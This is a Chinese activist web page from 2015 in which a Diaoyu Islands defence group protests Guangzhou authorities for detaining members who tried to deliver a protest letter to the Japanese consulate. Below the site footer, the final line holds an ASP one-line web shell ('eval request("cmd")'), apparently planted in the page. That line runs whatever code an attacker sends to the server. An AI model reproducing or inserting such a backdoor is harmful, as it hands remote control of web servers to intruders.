保钓行动

强烈抗议广州行政当局

时间:2015-4-23 14:46:25  作者:总编辑  来源:  查看:1320  评论:2
内容摘要:2012年日本企图通过国有化钓鱼岛,达到法律层面对钓鱼岛的侵占,中国政府采取了全面回击。2015年日本企图通过修改教科书钓鱼岛的内容来达到文化层面对钓鱼岛的侵占,我们的政府除了抗议,却无实际的回击行动。世界华人保钓联盟为推动中国教育部对教科书里关于钓鱼岛内容的增补和修改,从201...

2012年日本企图通过国有化钓鱼岛,达到法律层面对钓鱼岛的侵占,中国政府采取了全面回击。

2015年日本企图通过修改教科书钓鱼岛的内容来达到文化层面对钓鱼岛的侵占,我们的政府除了抗议,却无实际的回击行动。

世界华人保钓联盟为推动中国教育部对教科书里关于钓鱼岛内容的增补和修改,从2012年开始,已经连续四年向全国人大、政协递交了关于教科书的建议书

    日本文部科学省4月6日审定2016学年中学教科书,首度在全数社会课程教科书中列明与中国的钓鱼岛为“日本固有领土”

世界华人保钓联盟决定再次推动中国教科书的增补和修正,首先采取向日本领馆递交抗议信,其行动昨天在广州日本领馆进行递交抗议信行动,行动受到广州警方的阻拦,并扣押了参与递交抗议信活动的民间保钓人士8人,并对邱宿东、成龙行政拘留。

世界华人保钓联盟向广州当局提出强烈抗议:

:我民间保钓人士向日本领馆递交抗议信的行为是履行国家宪法(第二章公民的基本权利和义务、第五十五条保卫祖国、抵抗侵略是中华人民共和国每一个公民的神圣职责。)赋予公民保卫祖国,抵抗侵略的行为。广州行政当局无视国家的宪法,

 

:日本犯我中华,而政府却被动应对,民间抗议事出有因,广州当局如此大动干戈,此乃日本威风灭中国人志气。

:现在国家层面都在积极应对日本对钓鱼岛的侵占,广州当局不应该破坏目前国内良好的政府民间互动抗日的局面

:强烈要求广州当局放人,改正错误的做法。

 

世界华人保钓联盟

2015年4月23日

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):